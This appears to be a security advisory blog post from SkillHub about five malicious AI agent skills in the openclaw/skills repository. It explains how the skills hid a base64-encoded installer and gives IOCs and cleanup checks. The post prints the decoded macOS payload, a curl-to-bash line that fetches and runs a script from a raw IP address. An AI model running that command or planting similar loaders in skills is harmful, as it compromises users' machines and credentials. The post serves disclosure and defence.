We recently discovered malware hiding in plain sight within AI agent skill files on GitHub. This post details the attack, how we caught it, and what to do if you're affected.
What Happened
During routine AI-powered security reviews on SkillHub — an open-source marketplace for AI agent skills — our automated review pipeline flagged 5 skills from the openclaw/skills GitHub repository as malicious.
These skills disguise themselves as useful tools:
| Skill | Claimed Purpose | Downloads |
|---|---|---|
| auto-updater | Auto-update installed skills | 443 |
| gog | Google Workspace CLI | 176 |
| excel | Excel file handling | 149 |
| nano-pdf | PDF editing | 133 |
| youtube-watcher | YouTube transcripts | 115 |
Total affected downloads: ~1,016
The Attack
All five skills follow the same pattern:
- Present as a legitimate, useful tool
- Require installing "OpenClawProvider" as a dependency
- The installation instructions contain a base64-encoded command
On macOS, the encoded payload decodes to:
​/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"
This silently downloads and executes an arbitrary script from a raw IP address — a textbook malware delivery technique.
On Windows, users are directed to a password-protected archive (password: openclaw) from install.app-distribution.net.
Why This Matters
AI agent skills are a new attack surface. Skills are designed to be loaded by AI agents that often have system-level access — file system, shell execution, network. A malicious skill doesn't just compromise data; it can weaponize the AI agent itself.
This is a supply-chain attack targeting developers and AI users. The openclaw/skills repository has 90K+ commits and thousands of legitimate skills, providing cover for the malicious ones.
How We Caught It
SkillHub uses a multi-phase AI review pipeline:
- Phase A: Quick content filter scans for suspicious patterns (base64 blobs, encoded URLs, eval/exec patterns)
- Phase B: Deep file analysis examines the full skill contents and identifies obfuscated execution chains
The AI reviewer identified the base64→curl→bash pattern and automatically flagged the skills as malicious.
What We Did
All five skills were immediately:
- Flagged as malicious (warning page, not 404)
- File downloads blocked (HTTP 403)
- CLI installation blocked
- Removed from all browse/search listings
Are You Affected?
If you've installed any skills from openclaw/skills, check for:
Search for the malicious pattern
grep -r "OpenClawProvider" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null
grep -r "91.92.242.30" ~/.claude/ ~/.codex/ .cursor/ 2>/dev/null
If found: Delete the skill files, check your shell history and crontabs, rotate any credentials that were accessible, and run a malware scan.
IOCs
IP: 91.92.242.30 (Omegatech LTD, Seychelles)
Domain: install.app-distribution.net
Pattern: "OpenClawProvider" in setup instructions
Full Advisory
Read the complete advisory with detailed remediation steps: blog.palebluedot.live/malware-openclaw-skills-security-advisory
Investigation is ongoing. If you find suspicious skills, report them on SkillHub's support page.
SkillHub is an open-source marketplace for AI agent skills with automated security review.
Top comments (0)